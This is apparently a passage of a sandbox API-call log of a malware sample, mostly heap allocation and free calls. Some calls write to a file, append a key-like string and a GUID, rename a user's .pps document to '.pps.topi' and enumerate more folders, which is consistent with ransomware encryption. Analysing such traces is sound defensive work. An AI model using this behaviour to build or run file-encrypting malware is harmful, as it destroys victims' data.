RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03050 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.005] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x170cd, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x170cd, lpOverlapped=0x0) returned 1 [0097.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.006] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x170d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.006] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.006] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.006] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.006] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.007] CloseHandle (hObject=0x6a8) returned 1 [0097.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0097.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0097.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0097.020] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\GvT VcF9B.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\gvt vcf9b.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\GvT VcF9B.pps.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\gvt vcf9b.pps.topi")) returned 1 [0097.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.021] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.023] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93c7b320, ftCreationTime.dwHighDateTime=0x1d5c4e9, ftLastAccessTime.dwLowDateTime=0x4e4ef4c0, ftLastAccessTime.dwHighDateTime=0x1d5b5d0, ftLastWriteTime.dwLowDateTime=0x4e4ef4c0, ftLastWriteTime.dwHighDateTime=0x1d5b5d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLuF9crj", cAlternateFileName="")) returned 1 [0097.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317edb0 [0097.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0097.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ee58 [0097.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0097.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317edb0 | out: hHeap=0x680000) returned 1 [0097.023] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93c7b320, ftCreationTime.dwHighDateTime=0x1d5c4e9, ftLastAccessTime.dwLowDateTime=0x4e4ef4c0, ftLastAccessTime.dwHighDateTime=0x1d5b5d0, ftLastWriteTime.dwLowDateTime=0x4e4ef4c0, ftLastWriteTime.dwHighDateTime=0x1d5b5d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLuF9crj", cAlternateFileName="")) returned 0 [0097.023] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0097.023] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0097.024] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.028] 